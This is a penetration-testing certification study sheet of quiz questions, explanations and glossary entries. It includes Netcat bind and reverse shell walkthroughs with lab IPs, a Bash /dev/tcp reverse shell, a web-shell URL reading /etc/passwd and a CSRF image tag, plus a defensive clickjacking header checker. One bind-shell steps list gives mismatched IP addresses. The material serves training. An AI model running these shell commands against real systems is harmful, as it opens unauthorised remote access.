Your company carries out a penetration test on a regular basis. You are currently reviewing the report from the most recent penetration test. However, you recognize most of the findings as those that were reported in the last penetration test report. What does this indicate? A) Different tools were used to perform the most recent penetration test. B) The current penetration test was not properly completed. C) The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test. D) A different contractor was used to perform the most recent penetration test.

C) The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test. #If the mitigations had been deployed, the majority, if not all, of those vulnerabilities should be absent from the most recent report. Using a different contractor or different tools would not cause the same vulnerabilities to show up. Discovering many of the same vulnerabilities as the last penetration test is not an indication that the penetration test was not properly completed. An improperly completed test is likely to show few to no vulnerabilities. NOTE: After completing a penetration test and reviewing the results, it is important for a company to ensure that mitigations are deployed for the vulnerabilities reported in the findings section. Failure to do so is negligent and can result in legal issues. Companies should implement a time frame wherein all mitigations should be implemented.

While practicing your basic commands before a white box penetration test, you type the following: $ echo "There is a lot of space here" What will be the output? A) Thereisalotofspacehere B) There is a lot of space here C) There is a lot of space here D) None of these

C) There is a lot of space here #With the string quoted, the shell passes it to echo as a single argument, and echo prints it exactly as typed, including any run of spaces inside it. #Without the quotes, as in the following example, the shell first splits the text into separate words on whitespace, and echo then prints its arguments joined by single spaces, so the extra spaces are lost: $ echo There is a lot of space here The output from that command would be: There is a lot of space here

The value of the target has the largest effect on which characteristic of the pen test? A) rules of engagement B) schedule C) budget D) NDA

C) budget #When critical resources, or targets, are high-value or mission-critical, organizations tend to spend more time and money to test these against vulnerabilities. Therefore, the budget is most affected by the value of the target being pen tested. NOTE: The value of the target will not impact the schedule. What will impact the schedule is any need to assess resources under heavy loads, which is typically at certain times of the day. While the rules of engagement (ROE) can be used to exempt a high-value target from assessment, its value will not affect the rules of engagement if the target needs to be assessed.

When performing a compliance-based assessment, which of the following will present the largest challenges to obtaining complete results? A) limited time spent on assessment B) limited knowledge by assessor C) limited network access D) lack of assessment tools

C) limited network access #In many compliance-based assessments, restrictive rules of engagement, specifically those that limit which parts of the network may be tested, are the biggest impediment to complete results. Limited access to certain data storage areas is another. #Lack of assessment tools, limited assessor knowledge and limited time affect any assessment, but they are within the assessor's control and can be planned for, whereas the network access granted is dictated by the client and the compliance scope.

You teach a Linux course and have a large list of students enrolled in the course. After registration is complete, you need to sort the list of names alphabetically using commands on the Linux shell. You need a way to connect your output command with your sorting command. Which of the following will you use to accomplish this task? A) split B) redirection operator(>) C) pipe operator (|) D) cat

C) pipe operator (|) #The pipe operator (|) connects the standard output of one command to the standard input of the next. The following command feeds the given text (three names) into the sort command: $ echo -e "Carla\nArthur\nBrian" | sort The output of that command would be as follows: Arthur Brian Carla (The -e flag makes bash's echo interpret \n as a newline; printf 'Carla\nArthur\nBrian\n' | sort is the portable form.) #The redirection operator (>) sends output to a file rather than to another command. #The cat command (short for concatenate) displays the contents of a file on the standard output (stdout). The following example would display the contents of the echofile file: $ cat echofile #split breaks a file into pieces.

After being engaged by a client, you executed a SOW to perform a pen test. During the test, you were asked by the client to test an additional system that was not included in the original SOW. The original SOW was not revised and signed, and a new SOW was not executed. If you tested the additional system, what has occurred? A) corruption of results B) test dilution C) scope creep D) task bleed

C) scope creep #Pen tests are planned and carried out as formal projects. In project management, scope creep occurs when the original project plan is not followed precisely. It typically indicates the addition of tasks or initiatives not included in the original plan scope.

A penetration tester wants to run an Nmap script that will use MSRPC to enumerate user accounts on a target. Which script would be best for this scenario? A) smb-enum-shares.nse B) smb-enum-services.nse C) smb-enum-users.nse D) http-enum.nse

C) smb-enum-users.nse #The smb-enum-users.nse script enumerates all user accounts on a remote system. It uses the Microsoft Remote Procedure Call (MSRPC) protocol to perform the reconnaissance. MSRPC is a Microsoft client-server protocol that allows one program to request services of another machine without prior knowledge of the specific details of that machine's internal network. From a pen test perspective, the information gained by using this protocol allows testers to build out an internal network and footprint specific users that exists on a remote system.

One of the key executives in the company received an email that appeared to come from the IT security officer requesting that he log into the network using a provided link and confirm his contact information. He did so, and shortly thereafter sensitive documents on his computer were stolen. What type of attack occurred? A) elicitation B) phishing C) whaling D) vishing

C) whaling #Whaling is phishing aimed at a high-value target such as a senior executive, usually with a lure tailored to their role, here a message impersonating the IT security officer. The executive entered his credentials on the bogus login page, and the attacker used them to take the documents. Phishing is the generic, untargeted version; vishing is the same lure delivered by voice call. NOTE: This is also not an elicitation attack. In short, elicitation is the act of gaining knowledge or information from a person in conversation without directly asking for it.

You are performing a pen test and would like to determine if the LLMNR service is disabled as policy specifies. Which Windows registry key on each device can be reviewed for the proper setting? A) HKLM\SYSTEM\Policies\Microsoft\Windows NT\Parameters B) HKLM\Security\Policies\Microsoft\Windows NT\DNSClient C)HKLM\Software\Policies\Microsoft\Windows NT\DNSClient D) HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\

C) HKLM\Software\Policies\Microsoft\Windows NT\DNSClient #LLMNR is controlled by the EnableMulticast value under HKLM\Software\Policies\Microsoft\Windows NT\DNSClient, which is where the Group Policy setting "Turn off multicast name resolution" is written. If EnableMulticast is 0, Link-Local Multicast Name Resolution (LLMNR) is disabled; if the key or value is absent, the policy has not been set and LLMNR is on by default, which is what LLMNR poisoning attacks rely on. #The setting is not under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion; that branch holds unrelated per-machine settings such as the Uninstall entries behind the Programs and Features list. #The NetBT\Parameters\Interfaces key controls NetBIOS over TCP/IP (NetbiosOptions), a related but different name-resolution protocol that should also be disabled where policy allows.

CVSS (Common Vulnerability Scoring System)

CVSS is the Common Vulnerability Scoring System, an open framework for communicating the characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score from 0.0 to 10.0, which the Temporal and Environmental metrics can then adjust. In the CVSS v3.x qualitative scale a score of 9.0 or higher is Critical (7.0 to 8.9 High, 4.0 to 6.9 Medium, 0.1 to 3.9 Low); CVSS v2 has only Low, Medium and High, with 7.0 and above rated High. Findings in the top band should be remediated immediately.

Clickjacking

Clickjacking is putting a transparent clickable layer over a valid hyperlink. When you think you are clicking one hyperlink, you are actually clicking the invisible link above or behind it.
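Because the defence against clickjacking is a response header the site controls, checking for it is the first thing a tester does when assessing a page for UI redressing (the newsletter scenario above is a case in point). The following added example (not from the original page) evaluates a response's headers and returns a verdict; the header sets in the test are constructed.

```python
"""Evaluate HTTP response headers for clickjacking (UI redressing) protection."""


def _frame_ancestors(csp: str):
    """Return the source list of a CSP frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def framing_verdict(headers: dict) -> str:
    """'protected', 'weak' or 'vulnerable'.
    CSP frame-ancestors takes precedence: a browser that understands it ignores
    X-Frame-Options when both are present, so a permissive CSP undoes a strict XFO."""
    h = {k.lower(): v for k, v in headers.items()}
    ancestors = _frame_ancestors(h.get("content-security-policy", ""))
    if ancestors is not None:
        if not ancestors or ancestors == ["'none'"] or ancestors == ["'self'"]:
            return "protected"          # empty source list means 'none'
        if "*" in ancestors or any(t in ("http:", "https:") for t in ancestors):
            return "vulnerable"         # any origin may frame the page
        return "protected"              # explicit origin allow-list
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "protected"
    if xfo.startswith("ALLOW-FROM"):
        return "weak"                   # obsolete; modern browsers ignore it entirely
    if xfo:
        return "weak"                   # misspelt or multiple values are ignored by browsers
    return "vulnerable"                 # nothing stops an attacker page from framing this one


if __name__ == "__main__":
    samples = {  # constructed header sets
        "no headers": {},
        "xfo deny": {"X-Frame-Options": "DENY"},
        "csp none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
        "csp wildcard beats xfo": {"Content-Security-Policy": "frame-ancestors *",
                                   "X-Frame-Options": "DENY"},
        "obsolete allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    }
    for name, hdrs in samples.items():
        print(f"{name:24} -> {framing_verdict(hdrs)}")
```

A "protected" verdict only covers framing; pages that legitimately must be embedded by partners should list those origins in frame-ancestors rather than fall back to ALLOW-FROM.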

Cookie Manipulation

Cookie manipulation, also called cookie poisoning, is when a hacker is able to change data within that cookie to take over that user's information or bypass security measures on websites. Cookies are small pieces of data created and stored in a user's browser that keeps track of important information regarding the user's session information for a particular site.

Cryptojacking

Cryptojacking is a growing online threat in which malicious code hidden on a computer or mobile device uses the device's resources to mine cryptocurrency (Bitcoin, Litecoin, Ethereum and others) for the attacker's benefit, not the owner's. It can take over the device, and often the only signs are unusual outbound network traffic and sustained CPU or GPU drain visible in the task manager.

While performing a penetration test, you encounter several issues that you plan to document in the final report. However, you need to ensure that management is immediately notified of any critical issues documented in the communication escalation path. Which of the following is MOST likely to result in immediate communication to management? A) Encrypted personally identifiable information (PII) was discovered on several systems. B) A finding was discovered regarding an out-of-scope system. C) Unpatched applications exist on a system marked for retirement. D) A network compromise has previously occurred about which management knows nothing.

D) A network compromise has previously occurred about which management knows nothing. #Unpatched applications may exist on systems marked for retirement. However, this is usually not a critical issue because systems marked for retirement are often not updated regularly. This should be noted in the final report. #None of the other findings are critical, nor are they indicators of compromise. Critical findings and indicators of compromise are the only discoveries that should trigger communication, unless otherwise noted in the communication escalation directions. #Encrypted PII will often exist on multiple systems. However, encrypted PII is usually considered protected (unless a compromised encryption algorithm is being used). This issue would be included in the final report and only considered critical if 1) the PII should not be on the system on which it was discovered, or 2) the encryption algorithm being used to protect the PII has been compromised or is no longer considered secure.

An employee in your company received a text message from her bank stating that $1000 was just transferred out of her account. The bank wants to know if it was really her. On her desktop, you see what appears to be an authentic online session with her bank in one tab and a forum that looks kind of sketchy on another tab. You check out the forum site source code and notice this: <img src="http://bank.com/transfer.do?acct=BROOKE&amount=1000" width="0" height="0" border="0"> What do you think happened here? A) Clickjacking B) DoS C) SQL injection D) CSRF

D) CSRF #Cross-site request forgery (XSRF or CSRF) is the act of abusing a web site's trust by posing as a legitimate user. The attack can post false or harmful data on a forum, use/abuse open financial transactions, disable firewalls, and so on. The scary thing is that a compromised user may not know about these things until after the attack occurs.

A security analyst was provided with a detailed penetration report, which was performed against the organization's resources. It was noted on the report that a vulnerability on a file server has the following detailed CVSS 3.1 vector: CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N Which metric group in this vector should be of the highest concern to the security analyst? A) Integrity B) Availability C) Attack Vector D) Confidentiality

D) Confidentiality #The security analyst should be most concerned with the Confidentiality or C metric group because that metric group is rated as H or High. This means that there would be a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. #The Integrity metric group is rated at L or Low. This means modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. This is not as high as the C rating. #The Availability metric group is rated at N or None, meaning that there is no impact to availability within the impacted component. #The Attack Vector metric group is rated P or Physical, meaning that the attack requires the attacker to physically touch or manipulate the vulnerable component.

A user operating from her home network calls the IT department claiming that she is presented with a defaced website with suspicious-looking content when she accesses a company website. When this issue is investigated, the IT department sees no issues, and a log review shows that no files have been changed. Which of the following might explain the cause? A) MAC spoofing B) SQL injection C) ARP poisoning D) DNS poisoning

D) DNS poisoning #DNS cache poisoning is the act of entering false information into a DNS cache so that DNS queries return an incorrect response and users are directed to the wrong websites. This attack is also known as DNS spoofing. Because the IT department is not seeing the same things that the user is, it is likely that the user's DNS cache has been poisoned and her session is being redirected to a different website. NOTE: Though the two attacks are quite similar, ARP spoofing is carried out over a LAN and involves sending ARP packets to the default gateway in order to change the pairings in the gateway's IP address to MAC address table.

You must find metadata and hidden information within a document. Which tool should you use to complete this task? A) Theharvester B) Recon-ng C) Shodan D) FOCA

D) FOCA #The Fingerprinting Organizations with Collected Archives (FOCA) tool finds metadata and hidden information within documents. Because this specific function does not require any active actions, this is a method of passive reconnaissance. NOTE: The answer is not Theharvester. Theharvester enumerates DNS information about a given hostname/IP address. The answer is not Recon-ng. Recon-ng comes with Kali Linux and automates the information gathering of Open Source Intelligence (OSINT).

A penetration tester was able to convince an employee to give them valid login credentials, including username and password. You need to prevent this from happening in the future. Which remediation step should be recommended? A) Implement an IPS. B) Implement multi-factor authentication. C) Increase password complexity requirements. D) Mandate all employees take security awareness training.

D) Mandate all employees take security awareness training.

A network security analyst for the U.S. Department of Defense (DoD) is looking to gain information about a foreign adversary. What method should be used FIRST to collect and analyze information on this target? A) Vulnerability scanning B) Port scanning C) Packet crafting D) OSINT

D) OSINT #Open source intelligence (OSINT) refers to information collection without the need for any covert methods. This is often a good first step in reconnaissance or threat hunting. Typically, the information could be found on the Internet, and this type of collection can often start with a simple Google search.

You are evaluating the results of a successful penetration test. The following URL was used to launch the attack: http://hackable.com/images/image.php?cmd=cat+/etc/passwd The browser displays output resembling the following: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync mail:x:8:8:mail:/var/mail:/usr/sbin/nologin geoclue:x:128:137::/var/lib/geoclue:/usr/sbin/nologin king-phisher:x:130:139::/var/lib/king-phisher:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin debian-tor:x:131:140::/var/lib/tor:/bin/false Which type of attack was performed? A) PHP bind shell B) PHP reverse shell C) PHP cross-site script D) PHP web shell

D) PHP web shell #In a web shell attack, the attacker uploads a script file to a web site and then executes that script using the web server's interpreter. If a web site has a file upload feature that does not perform file type checks, the attacker can use the front door to get the script file on the web server.

You are a SOC analyst at a financial company. While examining the logs, you notice a strange address: http://normalsite.com/index.php?Phone=http://malwaresiteohnoes.com/revshell.php/run What kind of attack is happening? A) XSS B) SQL injection C) DoS D) Redirect

D) Redirect #Redirects are not inherently a bad thing in and of themselves. For instance, they are a useful function to have when building a website. If a user attempts to access a resource before they are logged in, it is conventional to redirect them to the login page, put the original URL in a query parameter, and automatically redirect them to their original destination after they have logged in. But there are always two sides to a coin! This is exactly why redirects are so enticing to spammers and phishers. They can bounce a user off of the site they want to go to and send them to an exact replica that is a malicious version of the site, where the user will log in and end up downloading malware, disclosing confidential information, and so on. This is a malicious redirect attack.

A hacker was able to hack into the POS system of a retail store and refund a large amount into his bank account. What is the most likely service method the hacker used to gain unauthorized access to the POS system? A) OS version B) FTP service C) POS application D) SNMP service

D) SNMP service #The Simple Network Management Protocol (SNMP) service may be abused to gain unauthorized access to network devices. It provides a standardized framework and a common language for monitoring and managing devices on a network. NOTE: Checking the point-of-sale (POS) application only identifies the application version and any known vulnerabilities for it. It is not a way to hack in by itself, as it is just enumeration. Likewise, checking the operating system (OS) version enumerates OS version details and checks them for any known vulnerabilities. Again, this is just enumeration, not a way to hack in.

Which of the following is NOT an important factor in creating the communication escalation path? A) contact information for all stakeholders B) communication schedule C) secure communication protocols D) stakeholder team structure

D) stakeholder team structure #A proper communication escalation path identifies who the tester should contact, how often contact can be made, and under what conditions the stakeholders should be contacted. It also includes their contact information. Specifically, it should include: contact information for all relevant stakeholders; frequency of communication with the stakeholders; method of communication with the stakeholders; and individuals to contact in case of emergency. The internal team structure of the stakeholders is not typically used in the process of creating a communication escalation path.

Dynamic Link Library (DLL) hijacking

DLL hijacking, like most hacks, abuses trust: an application asks for a certain DLL by name without specifying the full file path. DLLs are searched for in a defined order of directories. When you know that search order, you can implant a malicious DLL in a directory that is searched first; the loader picks up the first qualifying DLL it finds and loads it, and that will be your malicious DLL. NOTE: this would be a step after gaining file permissions that let you write to such a directory.

Full Path Disclosure (FPD)

Full path disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file (e.g. /home/omg/docs/file/). This is a great one to use and, if combined with a file inclusion vulnerability, can give a hacker access to tasty config files to have fun with.

man-in-the-middle attack

In a MITM attack, a hacker pollutes the ARP cache of two communicating systems in such a way that each of them is communicating with the hacker while believing it is communicating with the other, placing the attacker in a position to receive all traffic between them. #Occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them on to the legitimate receiver.

XSS

In XSS attacks, hackers exploit input and scripting vulnerabilities to launch a malicious script in the client-side browser. XSS includes stored, reflected, and DOM-based attacks. It comes in many flavors; the most common is stored cross-site scripting (XSS), also called persistent XSS, which occurs when someone has implanted malicious code into the site so that it runs every time someone accesses that website. The attacker usually gets the code into the site via a login form, message board, or some other type of input.

KARMA attack

In a Karma Attacks Radioed Machines Automatically (KARMA) attack, the goal is to enumerate and generate SSIDs which the stations (which can include phones, laptops, and anything with a radio) have saved in their Preferred Network List (PNL). These are network profiles saved in the station, complete with credentials, that stations attempt to locate with probe requests at all times when they are not associated with an AP.

Successful bind shell connection

In a bind shell, an attacker connects directly to a target system's shell, usually bound to a listening port. First, the target machine creates the listening port as indicated in the following command line:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned> nc.exe -lvp 4444 -e cmd.exe
listening on [any] 4444 ...
In this case, the target machine is a Windows 7 host running the Netcat tool. The combined -lvp switch will create a network service listening on port 4444. The backdoor switch -e will pass the Windows command shell to the attacker. Next, the attacker simply connects to the shell using the Netcat tool:
root@kali:~# nc 172.18.60.251 4444
This command is issued on a Kali Linux host. If the execution is successful, the target host will indicate success as follows:
connect to [172.18.60.251] from kali.home.net [172.18.60.249] 44348
On the attack host, the following output indicates success:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned>
The attacker now has access to the Windows console on the target host and can execute any local shell commands remotely.

Bind Shell

In a bind shell, an attacker connects directly to a target system's shell, usually bound to a listening port. You would perform the following steps for a Netcat bind shell, not a reverse shell:
1) Run C:\Users\Admin> nc.exe -lvp 4444 -e cmd.exe on 172.18.60.250 (target host).
2) Run root@kali:~# nc 172.18.60.248 4444 on 172.18.60.248 (attack host).
3) Run C:\Users\Admin> dir on 172.18.60.248 (attack host).
The first step binds the command shell directly to the network service listener. The attacker then connects to the target host in the second step. The third step is the same as for a reverse shell. NOTE: You would not run root@kali:~# ls because the scenario requires you to list the Admin user's directory on the Windows 7 victim, not the contents of the root user's directory on the Kali Linux attack host.

SQL injection attack

In an SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (') are characteristic of these attacks. For example, the single quote in SQL is a delimiter, meaning it ends any current SQL string. This is important for attackers who craft always-true conditions or statements to bypass authentication or pull more information from a database than they are allowed to.

Reverse Shell

In a reverse shell, a network service listens on the attack host, the target then passes its shell to the attacker, and the attack host executes shell commands remotely on the target host. To list the contents of the Admin user's directory using a Netcat reverse shell, you would perform the following steps:
1) Run root@kali:~# nc -lvp 4444 on 172.18.60.248 (attack host).
2) Run C:\Users\Admin> nc.exe 172.18.60.248 4444 -e cmd.exe on 172.18.60.250 (target host).
3) Run C:\Users\Admin> dir on 172.18.60.248 (attack host).
The first step sets up the network service on the attack host using Netcat over port 4444. The output would resemble the following:
listening on [any] 4444 ...
The second step then connects the target host to the attack host using Netcat. The output on the attacker machine will now resemble the following:
connect to [172.18.60.248] from Win7Victim.home.net [172.18.60.250] 49435
Microsoft Windows [Version 6.1.7600]
Now that the connection has been established with the Windows console prompt, the third step lists the directory of the Admin user from the attack host using the dir command.

Pass the Hash Attack

In this attack, the hacker attempts to locate the hash of a password that exists on multiple machines (such as a domain admin account) and uses that hash to sign in to those machines with the same rights. This typically exploits the Server Message Block (SMB) service and can be done from the Metasploit framework using the psexec utility.

Replay Attack (session replays)

In this attack, packets of interest (typically containing authentication credentials) are captured and re-sent at another time, allowing successful authentication to a service or device.

Out-of-scope systems issues

Issues with out-of-scope systems should be noted in the final report. However, out-of-scope systems should not be thoroughly tested. Often you may accidentally discover an issue with an out-of-scope system, but issues with out-of-scope systems should only be reported and not investigated further unless priorities change. KEEP IT OUT OF UR SIGHT!!

Requirement of prioritization after receiving penetration test report

It may be necessary to reprioritize the goals of the penetration test if discoveries are made during the test that warrant the reprioritization. Reprioritization cannot occur after the penetration testing report is provided. However, lessons learned from a penetration test can help shape the goals of the next penetration test.

Shodan

Shodan is a search engine which identifies vulnerable systems on the internet. Shodan scans the internet looking for these vulnerable/exposed systems and puts the results on its website. Because penetration testers can gather information about these systems without actively scanning them themselves, this is a method of passive reconnaissance.

Skadi AIDA DEFT

Skadi is an all-in-one solution for parsing collected data. This makes the data easily searchable and allows searching across multiple hosts simultaneously. Digital Investigation and Analysis (AIDA) is an appliance with many tools aimed at digital investigation/acquisition. It is VMware-based. Digital Evidence and Forensics Toolkit (DEFT) is a Linux distribution mainly aimed at the collection of computer forensic evidence.

Smurf Attack

A Smurf attack occurs when a combination of Internet Protocol (IP) spoofing and Internet Control Message Protocol (ICMP) messages saturates a network.

The Master services agreement (MSA)

The master services agreement (MSA) is used to set parameters for ongoing tests, each with its own SOW. Having an MSA on file means that penetration testers do not need to renegotiate terms for every test with established clients. The schedule of payment would be established separately in the SOW for a specific project, regardless of the presence of an MSA.

Successful reverse shell

The following demonstrates a reverse shell using Netcat. First, set up the network service on the attack host:
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
Then the target host makes the connection:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned> nc.exe 172.18.60.249 4444 -e cmd.exe
Finally, the connection is established between attacker and target, allowing the attacker to remotely execute commands on the target host:
connect to [172.18.60.249] from win7.home.net [172.18.60.251] 49435
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned>
The following is an example of a Bash reverse shell. On the attack host, run Netcat to set up the network service listener:
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
This time, instead of using Netcat to pass the Bash shell, you can instead pass it directly using Bash on the target host:
[root@blackarch ~]# bash -i>& /dev/tcp/172.18.60.249/4444 0>&1
This command redirects Bash input and output to the attack host. Once this executes, the attack host will receive this output:
connect to [172.18.60.249] from blackarch.home.net [172.18.60.252] 44612
[root@blackarch ~]#
The result is the same: the attacker can now issue commands on the target host remotely.

NDA (Non-Disclosure Agreement)

The non-disclosure agreement (NDA), which is signed by the tester, requires the tester to keep all company information private. It does not address payment.

WPS implementation weakness attack

A WPS implementation weakness attack is an attack on the Wi-Fi Protected Setup (WPS) service, which was designed to make attaching new devices to a home wireless network easier by transmitting the WPA or WPA2 PIN to the new device. By using a utility called Reaver, the PIN can be cracked.

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and see them enter the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE) a) Returns only files hosted as diontraining.com b) Excludes Microsoft Excel spreadsheets c) Personalization is turned off d) All search filters are deactivated e) Returns only Microsoft Excel spreadsheets f) Find sites related to diontraining.com

a) Returns only files hosted as diontraining.com c) Personalization is turned off e) Returns only Microsoft Excel spreadsheets #The above example searches for files with the name "password" in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ':') and (+) limits the results to files hosted on diontraining.com (site%3Adiontraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the "related:" term to the query. To deactivate all filters from the search, the "filter=0" should be used. To deactivate the directory filtering function, the "filter=p" is used.

Which of the following commands should be run on an attacker's system to connect to a target with a bind shell running? a) nc 192.168.1.53 31337 b) nc 192.168.1.53 31337 -e /bin/sh c) nc -lp 31337 -e /bin/sh d) nc -lp 31337

a) nc 192.168.1.53 31337 #A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you should execute the command "nc -lp 31337 -e /bin/sh" on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command "nc 192.168.1.53 31337" to connect to the victim's bind shell. #A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command "nc -lp 31337" on it. To connect to the attacking machine from the victim machine, you would enter the command "nc 192.168.1.53 31337 -e /bin/sh" on it.

